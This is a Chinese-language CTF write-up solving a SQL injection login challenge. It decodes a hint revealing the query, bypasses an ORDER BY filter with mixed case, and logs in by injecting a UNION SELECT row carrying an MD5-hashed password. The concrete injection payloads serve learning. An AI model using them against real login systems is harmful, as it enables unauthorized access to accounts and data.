题目
这题看到这个页面,而且题目上说的。给人的感觉就是个SQL注入题。。。。
启动BurpSuite抓包看看
有两个可疑点:
- 一是报用户错误(wrong user!),通常如果有这种错误的时候要先爆破账号,得到正确的账号后再去爆破密码。
- 这里返回的绿色部分明显是加密后的数据
首先提取绿色部分的信息,经过排查发现可以先base32解密,再base64
原数据:
MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
先base32解密:
c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
再base64解密:
select * from user where username = '$name'
看到这个SQL语句,果然是需要先爆破账号。。。
但实际上并不需要真的爆破账号,因为它的用户名就是:admin。这在许多CTF里很常见,因为它并不是真的要考爆破账号,所以它会设置一个常见的值。就好比是这个admin就很常见。
它返回了wrong pass!就表示可以进行下一步了。
接下来就是套路化的操作了,先通过order by来确定有多少列
name=admin' order by 1 %23&pw=123456
发现order by被过滤了,试试看大小写能不能绕过
name=admin' oRder by 1 %23&pw=123456
发现是可以的,所以:
- name=admin’ oRder by 1 %23&pw=123456
(正常显示) - name=admin’ oRder by 2 %23&pw=123456
(正常显示) - name=admin’ oRder by 3 %23&pw=123456
(正常显示) - name=admin’ oRder by 4 %23&pw=123456
(报错显示)
所以可以确认该表中只有3列
那接下来就是爆破数据库了,但是经过测试发现它把括号()给过滤掉了。这咋整???函数基本都是要加括号的。。。。
然后上传找教程是说,这题可以通过union这个关键字创建虚拟表。
就好比我在自己的数据库中有个test的表,表里有6列。所以:
select * from users;
然后再通过union关键字生成虚拟的数据:
select * from users union select 1,2,3,4,5,6;
可以看到加上union关键字后会在第四行生成我们自己定义好的数据。为什么说是虚拟的呢?因为union产生的数据是临时的,在下次查询的时候就会发现它不见了(因为它没有实际保存在数据库中)。
而这题就是利用这个原理,一开始我们已经确定好了它的用户名为:admin。但是它的密码我们却不知道,这时我们可以通过union来创建一个虚拟的数据,然后再通过SQL语句来查询它。这样它就能正常返回值了。比如:
select * from users union select 1,'admin','your input password',4,5,6;
所以原题目的payload可以改成:
name=1' union select 1,'admin','123456' %23&pw=123456
但是却发现还是不能拿到flag,问题何在???
思路是对的,只是出题方不想你这么简单的拿flag。所以密码的那部分还加了md5加密。
正确的payload是:name=1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e' %23&pw=123456
其中的e10adc3949ba59abbe56e057f20f883e是123456经过MD5加密后的值。
这个123456和后面的pw=123456对应
总结: 不得不说,那些第一次靠自己做出来这道题的大佬是真的厉害。通过他们我又学到东西了